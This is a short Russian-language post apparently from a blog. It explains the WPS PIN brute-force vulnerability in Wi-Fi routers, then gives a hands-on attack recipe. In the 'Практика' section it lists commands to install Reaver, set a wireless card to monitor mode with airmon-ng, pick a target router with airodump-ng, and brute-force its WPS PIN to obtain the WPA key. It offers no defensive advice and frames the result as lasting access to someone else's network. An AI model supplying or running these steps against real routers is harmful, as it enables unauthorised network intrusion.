27 декабря Department of Homeland Security's Computer Emergency Readiness Team сообщил о новой уязвимости в ВайФай роутерах. Уязвимым местом оказалась технология WPS (WiFi Protected Setup) реализованная почти во всех современных устройствах. Ее цель упростить процесс подключения между собой сетевых устройств, используя жестко вшитый в него пин код (часто этот пин указывается на самом роутере). Stefan Veihbock обнаружил уязвимость в самой технологии WPS, которая позволяет использовать атаку типа брутфорс против устройства. После 11,000 попыток можно получить этот самый пинкод. А зная его вы получаете и WPA ключи. Причем во многих роутерах нет возможности сменить этот код, что означает: однажды получив его, вы получаете карточку постоянного клиента, и сколько бы раз в последствии не менялся WPA ключ, вас это уже волновать не будет. И хоть эта уязвимость была известна уже около года, в паблик она попала только месяц назад, с релизом опенсурс продукта Reaver от компании Tactical Network Solutions.
Практика:
1. Нужен Linux (показываю на примере debian way)
2. Устанавливаем reaver:
apt-get update apt-get install reaver
3. Мониторим сеть
airmon-ng start wlan0
4. Выбираем цель
airodump-ng mon0
5. запускаем ривер
reaver -i moninterface -c channel -b bssid -vv
Warning: Один существенный минус: Долго брутит! процесс может занимать от 3 до 9 часов (может больше) + важно качество сигнала